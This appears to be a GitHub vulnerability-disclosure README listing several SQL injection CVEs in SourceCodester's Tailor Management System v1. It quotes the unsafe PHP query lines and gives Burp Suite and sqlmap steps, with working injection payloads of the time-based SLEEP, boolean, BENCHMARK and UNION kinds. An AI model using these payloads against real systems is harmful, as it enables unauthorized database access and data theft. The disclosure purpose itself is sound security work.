Headline
CVE-2020-36071: CVE-s/README.md at main · Abdallah-Fouad-X/CVE-s
SQL injection vulnerability found in Tailor Management System v.1 allows a remote authenticated attacker to execute arbitrary code via the customer parameter of the email.php page.
CVE-s + Tailor Management System V.1
[Vulnerability Type]
SQL Injection
[Affected Component]
as you can see in email.php line 50 $result = $pdo->query(“SELECT email FROM customer WHERE fullname=’$customer’”); the parameter “$customer” is not filtered ,and without prepare statement .
[Attack Type]
Remote
[Attack Vectors]
you have to be authenticated , go to email.php file and full all the inputs with the necessary information, intercept the request using burp suite, and in the request you will see the method is post and the customer parameter will be exploitable , you will save the request and using sqlmap to exploit the vulnerability . Parameter: #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: customer=0’ AND (SELECT 2532 FROM (SELECT(SLEEP(5)))ZLDl) AND 'Dfud’=’Dfud&template=Your Clothes are ready for collection. Thanks for your patronage&message=Dear 0, Your Clothes are ready for collection. Thanks for your patronage
[Discoverer]
Abdallah Fouad , Bassam Assiri
[Vendor of Product]
SourceCodester
[Affected Product Code Base]
Tailor Management System V.1
RISK: High
[Vulnerability Type]
SQL Injection
[Affected Component]
by reviewing the source code, $oldd = $pdo->query(“SELECT * FROM customer WHERE id=’".$eid."’”); line 90 $eid = $_GET[“id”]; line 41 no validation found while execution the query
[Attack Type]
Remote
[Attack Vectors]
after login navigate the this page : http://localhost/tailor/customeredit.php , and edit the user data you will see the parameter reflected in url like this : http://localhost/tailor/customeredit.php?id=1 , using the sqlmap with this link you should see the following Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1’ AND 8449=8449 AND ‘iurJ’=’iurJ Type: time-based blind Title: MySQL < 5.0.12 OR time-based blind (heavy query) Payload: id=1’ OR 3412=BENCHMARK(5000000,MD5(0x67504658)) AND ‘Vzxv’=’Vzxv Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: id=-2894’ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171787671,0x526c664b74446c5277577653754f7146475152747377417975734579655658764766626e6869694a,0x7178787671),NULL,NULL-- pUIM
[Discoverer]
Abdallah Fouad , Bassam Assiri
[Vendor of Product]
SourceCodester
[Affected Product Code Base]
Tailor Management System V.1
RISK: High
[Vulnerability Type]
SQL Injection
[Affected Component]
by reviewing the source code in document.php from line 43 to line 57 ( $detail = $_POST[“detail”]; ) ,execute the query in line 57 $res = $pdo->exec(“INSERT INTO documents SET title=’".$title."’, detail=’".$detail."’, img=’".$bgimg."’”);
[Attack Type]
Remote
[Attack Vectors]
login and go http://localhost/tailor/document.php , set the document title and send the request , by intercept the request using burp suite and save the request and send it request to sqlmap this will confirm the vulnerability exist Parameter: MULTIPART #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundaryvizUXbIL1AEu2VY4 Content-Disposition: form-data; name="title" ------WebKitFormBoundaryvizUXbIL1AEu2VY4 Content-Disposition: form-data; name="detail" aa’ AND (SELECT 2393 FROM (SELECT(SLEEP(5)))JGfe) AND 'keIn’=’keIn ------WebKitFormBoundaryvizUXbIL1AEu2VY4 Content-Disposition: form-data; name="bgimg"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryvizUXbIL1AEu2VY4–
[Discoverer]
Abdallah Fouad , Bassam Assiri
[Vendor of Product]
SourceCodester
[Affected Product Code Base]
Tailor Management System V.1
RISK: High
[Vulnerability Type]
SQL Injection
[Affected Component]
by reviewing the source code in document.php from line 42 to line 57 ( $title = $_POST[“title”]; ) ,execute the query in line 57 $res = $pdo->exec(“INSERT INTO documents SET title=’".$title."’, detail=’".$detail."’, img=’".$bgimg."’”);
[Attack Type]
Remote
[Discoverer]
Abdallah Fouad , Bassam Assiri
[Vendor of Product]
SourceCodester
[Affected Product Code Base]
Tailor Management System V.1
RISK: High
[Vulnerability Type]
SQL Injection
[Affected Component]
After reviewing the source code for the software, I found that in orderadd.php file using unsafe way to insert the data from the requests without any validation. from line number 45 (the query ),and execute the query in line 54.
[Attack Type]
Remote
[Attack Vectors]
after login go to http://localhost:8080/tailor/tailor/orderadd.php page , then full out all the form , intercept the request by using burp suite and by using sqlmap with inject able point from the POST request { customer=&desc=test&date_received=&amount=1&paid=1&completed=Yes&date_collected=2020-12-26 } , the customer. sqlmap data : (custom) POST parameter '#1' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 93 HTTP(s) requests: — Parameter: #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: customer=’ AND (SELECT 9665 FROM (SELECT(SLEEP(5)))QEDW) AND 'dcCY’=’dcCY&desc=
X&date_receiv ed=&amount=1&paid=1&completed=Yes&date_collected=2020-12-26 ==================================================================================--------
[Discoverer]
Abdallah Fouad Mohamed
[Vendor of Product]
SourceCodester
[Affected Product Code Base]
Tailor Management System V.1
RISK: High
Impact: he impact SQL injection can have on a business is far-reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.